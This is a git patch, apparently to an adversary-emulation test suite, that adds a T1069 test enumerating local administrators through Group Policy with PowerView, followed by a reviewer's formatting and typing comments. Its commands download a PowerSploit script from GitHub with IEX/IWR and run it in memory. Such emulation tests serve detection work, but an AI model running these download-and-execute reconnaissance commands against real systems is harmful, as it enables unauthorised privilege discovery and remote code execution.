From e0eaff95eacde7dfdf8e0d7e260ad7f9e8ff7670 Mon Sep 17 00:00:00 2001
From: Andrew Beers
Date: Thu, 21 May 2020 17:04:33 -0500
Subject: [PATCH] T1069 find local admins via group policy power view (#1006)

* T1069 Find Local Admins via Group Policy (PowerView)

* fix default param

Co-authored-by: Carrie Roberts
---
 atomics/T1069/T1069.yaml | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/atomics/T1069/T1069.yaml b/atomics/T1069/T1069.yaml
index 869f1062..8cc7a3ca 100644
--- a/atomics/T1069/T1069.yaml
+++ b/atomics/T1069/T1069.yaml
@@ -80,7 +80,6 @@ atomic_tests:
 auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
 description: |
 Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
-
 supported_platforms:
 - windows
 
@@ -103,3 +102,22 @@ atomic_tests:
 elevation_required: false
 command: |
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin -Verbose
+
+- name: Find Local Admins via Group Policy (PowerView)
+ description: |
+ takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ computer_name:
+ description: hostname of the computer to analyze
+ type: Path
+ default: $env:COMPUTERNAME
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
\ No newline at end of file
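Review bot: `type: Path` on the new `computer_name` input argument is the wrong type for a hostname — the value is fed to `-ComputerName`, not resolved as a filesystem path — so it should read `type: String`, matching what the `default: $env:COMPUTERNAME` actually yields. The argument is also interpolated unquoted into the PowerShell command line; quoting it as `-ComputerName "#{computer_name}"` keeps the `$env:` default expanding while tolerating values that contain spaces or other shell-significant characters. Two smaller points in the same hunk: the description begins with a lowercase "takes a computer…" where the sibling test's description starts with a capitalised sentence, and the commit leaves the file without a trailing newline (`\ No newline at end of file`), which is worth restoring before the next edit to this YAML.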